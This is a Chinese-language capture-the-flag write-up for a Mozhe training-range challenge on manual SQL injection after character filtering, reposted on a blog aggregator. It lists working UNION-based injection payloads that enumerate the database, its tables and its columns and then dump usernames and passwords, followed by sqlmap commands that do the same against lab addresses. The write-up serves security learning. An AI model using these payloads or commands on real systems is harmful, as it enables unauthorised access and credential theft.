墨者：SQL過濾字符后手工注入漏洞測試(第3題)

因為練習過太多的sql注入，廢話不多介紹，我會通過圍繞手動注入和工具爆破的方式達到靶場目標，開練！！！

測試從"http://124.70.71.251:43066/new_list.php?"開始,以自己的靶場地址為準。

常見注入點：id=1 and 1=2,id=1'，id=1"等等，本次靶場是單引號閉合。

id=1' order by 8--+

'：單引號用于閉合SQL語句中的字符串
order by：用于確定查詢結果集的列數，字段max=7
--+：注釋掉后續SQL語句，避免語法錯誤

[截圖位置]

id=-1' union select 1,2,3,4,5,6,7--+

union select：聯合查詢，用于顯示可回顯的字段位置
-1：確保原查詢不返回結果，只顯示union select的結果

[截圖位置]

id=-1' union select 1,database(),version(),user(),5,6,7--+

database()：獲取當前數據庫名稱
version()：獲取數據庫版本信息
user()：獲取當前數據庫用戶

[截圖位置]

id=-1' union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema='min_ju4t_mel1i'--+

information_schema.tables：系統表，存儲所有表信息
group_concat()：將多行結果合并為一行
table_schema：指定數據庫名稱

[截圖位置]

id=-1' union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name='(@dmin9_td4b}'--+

information_schema.columns：系統表，存儲所有列信息
table_name：指定要查詢的表名

[截圖位置]

id=-1' union select 1,group_concat(username),group_concat(password),4,5,6,7 from `(@dmin9_td4b}`--+

username,password：目標表的敏感字段
反引號`：用于包裹特殊表名

[截圖位置]

python sqlmap.py -u "http://124.70.64.48:43983/new_list.php?id=1" --dbs --batch

--dbs：枚舉所有數據庫
--batch：自動選擇默認選項

[截圖位置]

python sqlmap.py -u "http://124.70.64.48:43983/new_list.php?id=1" -D min_ju4t_mel1i --tables --batch

-D：指定數據庫
--tables：枚舉指定數據庫的所有表

[截圖位置]

python sqlmap.py -u "http://124.70.64.48:43983/new_list.php?id=1" -D min_ju4t_mel1i -T (@dmin9_td4b} --columns --batch

-T：指定表名
--columns：枚舉指定表的所有列

[截圖位置]

python sqlmap.py -u "http://124.70.64.48:43983/new_list.php?id=1" -D min_ju4t_mel1i -T (@dmin9_td4b} -C id,username,password,status --dump --batch

-C：指定要導出的列
--dump：導出指定表的數據

[截圖位置]

python sqlmap.py --purge

--purge：清除sqlmap緩存文件
該指令用于清除sqlmap的緩存，因為重啟靶場，端口會發生變化，可能獲取到的password是之前的數據，詳細的sqlmap指令獲取如下：

python sqlmap.py -h

本次測試通過手工注入和sqlmap工具兩種方式完成了SQL注入漏洞測試：

聲明：本文僅用于安全學習，嚴禁非法測試！ ???

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/bicheng/91209.shtml
繁體地址，請注明出處：http://hk.pswp.cn/bicheng/91209.shtml
英文地址，請注明出處：http://en.pswp.cn/bicheng/91209.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！